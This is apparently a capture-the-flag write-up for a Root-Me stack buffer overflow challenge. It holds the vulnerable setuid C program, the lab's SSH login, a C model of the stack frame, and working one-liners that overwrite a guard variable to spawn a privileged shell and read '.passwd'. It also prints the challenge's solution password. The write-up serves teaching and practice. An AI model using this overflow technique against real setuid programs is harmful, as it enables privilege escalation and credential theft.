* ELF x86 - Stack buffer overflow basic 1

** Task

Environment settings (as listed by the challenge):

| Setting   | Meaning                            | Status   |
|-----------+------------------------------------+----------|
| PIE       | Position Independent Executable    | disabled |
| RelRO     | Read Only relocations              | disabled |
| NX        | Non-Executable Stack               | disabled |
| Heap exec | Non-Executable Heap                | disabled |
| ASLR      | Address Space Layout Randomization | disabled |
| SF        | Source Fortification               | disabled |
| SRC       | Access to the source code          | enabled  |

Source code:

#+begin_src C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
    int var;
    int check = 0x04030201;
    char buf[40];

    /* Size argument 45: fgets stores up to 44 input bytes plus a
       terminating NUL, i.e. 45 bytes, into a 40-byte buffer. The
       excess lands in whatever the compiler placed after buf; on the
       target that is check. */
    fgets(buf, 45, stdin);

    printf("\n[buf]: %s\n", buf);
    printf("[check] %p\n", check);   /* the challenge prints the int via %p */

    if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf("\nYou are on the right way!\n");

    if (check == 0xdeadbeef) {
        printf("Hell yeah! You win!\nOpening your shell...\n");
        setreuid(geteuid(), geteuid());   /* real uid := effective (setuid) uid */
        system("/bin/bash");
        printf("Shell closed! Bye.\n");
    }

    return 0;
}
#+end_src

#+begin_quote
Credentials for the exercise
Host: challenge02.root-me.org
Protocol: SSH
Port: 2222
SSH access: ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
Username: app-systeme-ch13
Password: app-systeme-ch13
#+end_quote

** Findings (live target)

- Remote path: =/challenge/app-systeme/ch13=
- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
- Effective mitigations from runtime check (these differ from the challenge listing above; the values measured on the binary are the ones that count):
  - Partial RELRO
  - No stack canary
  - NX enabled
  - No PIE
  - ASLR OFF (on target host)
- Vulnerability: =fgets(buf,45,stdin)= stores up to 44 input bytes plus a terminating NUL into =char buf[40]=. Input bytes 40 to 43 land in the adjacent =check=; the NUL goes one byte further, which is harmless here.
- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef=, i.e. the little-endian bytes =\xef\xbe\xad\xde=.
- NX is irrelevant to this path: no code is injected, only a data value is changed and the binary itself spawns the shell. The missing stack canary is what lets the plain overwrite go unnoticed.
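** Payload mechanics, checked offline

The following is an added example, not code from the challenge or from root-me. It models the =ch13= frame as a 48-byte array in which =check= starts at offset 40, directly after =buf= (an assumption that matches the behaviour observed on the target; the real stack layout is compiler-dependent), feeds a payload to the real =fgets(buf, 45, ...)= through a =tmpfile()= stream standing in for stdin, and returns what =check= holds afterwards. =build_payload=, =run_frame= and =check_after= are names chosen here. Running it shows why exactly 40 filler bytes are needed: one byte short or one byte too many shifts the four target bytes and =check= no longer reads =0xdeadbeef=.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Model of the ch13 frame as the live run confirmed it: the 40-byte buf is
 * followed directly by check (assumed layout, matching observed behaviour);
 * the trailing 4 bytes stand in for whatever the compiler put after check. */
#define BUF_SIZE   40
#define CHECK_OFF  40
#define FRAME_SIZE 48
#define FGETS_N    45   /* the size argument ch13 passes to fgets */

/* Same payload as the python one-liner: `pad` filler bytes, then `value`
 * encoded little-endian as x86 stores an int. Returns the payload length. */
size_t build_payload(unsigned char *out, size_t pad, uint32_t value) {
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++)
        out[pad + i] = (unsigned char)(value >> (8 * i));
    return pad + 4;
}

/* Decode 4 bytes as a little-endian uint32, independent of the host's endianness. */
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Feed `input` to the real fgets(buf, 45, stream) against a frame whose check
 * field starts as 0x04030201 (bytes 01 02 03 04), like ch13, and return what
 * check holds afterwards. Returns 0 if the scratch stream cannot be created. */
uint32_t run_frame(const unsigned char *input, size_t len) {
    unsigned char frame[FRAME_SIZE];
    static const unsigned char initial[4] = {0x01, 0x02, 0x03, 0x04};

    memset(frame, 0, sizeof frame);
    memcpy(frame + CHECK_OFF, initial, sizeof initial);

    /* tmpfile() keeps this ISO C: a scratch stream replaces stdin. */
    FILE *in = tmpfile();
    if (!in) return 0;
    fwrite(input, 1, len, in);
    rewind(in);

    /* ch13's call. fgets stops after 44 bytes, at EOF or after the first
     * '\n', then appends a NUL: up to 45 bytes land at frame[0..44], and
     * frame[40..43] is check. Writing inside `frame` keeps this well defined
     * on the host while reproducing what the unchecked write does to ch13. */
    fgets((char *)frame, FGETS_N, in);
    fclose(in);

    return le32(frame + CHECK_OFF);
}

/* Convenience: what check becomes for `pad` filler bytes followed by `value`. */
uint32_t check_after(size_t pad, uint32_t value) {
    unsigned char payload[64];
    if (pad > sizeof payload - 4) return 0;
    size_t n = build_payload(payload, pad, value);
    return run_frame(payload, n);
}

int main(void) {
    /* 40 filler bytes: the four target bytes land exactly on check. */
    printf("pad 40 -> check = 0x%08x\n", check_after(BUF_SIZE, 0xdeadbeefu));
    /* One byte short or one byte long: the target bytes are shifted. */
    printf("pad 39 -> check = 0x%08x\n", check_after(BUF_SIZE - 1, 0xdeadbeefu));
    printf("pad 41 -> check = 0x%08x\n", check_after(BUF_SIZE + 1, 0xdeadbeefu));
    return 0;
}
```

A newline anywhere in the first 44 bytes ends the =fgets= call early and leaves =check= untouched, which is why the one-liners on this page write the payload with =sys.stdout.buffer.write= and no trailing newline; bytes beyond the 44th are simply left unread by this call.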
** Working exploitation flow

- Basic trigger (proves control of =check=):

#+begin_src sh
python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
#+end_src

With a bare pipe the spawned =/bin/bash= inherits an stdin that is already at EOF, so it exits at once and only "Shell closed! Bye." is seen.

- To keep stdin open for the spawned SUID shell, run the payload and =cat= in a subshell and pipe that into =ch13=; after the payload has been delivered, =cat= keeps forwarding the terminal's input to bash:

#+begin_src sh
(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')"; cat) | ./ch13
#+end_src

Then, typed into the shell that =ch13= spawns:

#+begin_src sh
id
cat .passwd
exit
#+end_src

- Observed privilege in spawned shell:
  - =uid=1213(app-systeme-ch13-cracked)=
  - =gid=1113(app-systeme-ch13)=
- Retrieved validation password:
  - =1w4ntm0r3pr0np1s=

** Helper scripts

- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.